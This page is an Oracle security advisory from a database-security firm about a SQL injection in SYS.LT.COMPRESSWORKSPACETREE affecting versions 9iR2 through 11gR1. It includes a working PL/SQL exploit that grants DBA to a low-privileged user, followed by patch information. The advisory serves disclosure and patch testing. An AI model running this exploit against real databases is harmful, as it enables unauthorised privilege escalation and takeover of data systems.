Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit

Name Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit
Systems Affected Oracle Database Server versions 9iR2, 10gR1, 10gR2 and 11gR1
Severity High Risk
Category Escalate User Privileges
Vendor URL http://www.oracle.com/
Credit Esteban Martinez Fayo
Exploit http://www.milw0rm.com
Date 2 Jul 2009

Details

The COMPRESSWORKSPACETREE procedure is owned by SYS or by WMSYS (depending on the Oracle version), one user can call this procedure with malicious code and execute
PL/SQL statements and elevate the privileges as the user were the package owner.

Example
Example written from Sumit Siddharth

SQL> DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
end;
/




Patch Information
Apply the latest Oracle Security patches (e.g. CPU April 2009 )





2009 by Red-Database-Security GmbH - last update 19-jun-2009

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.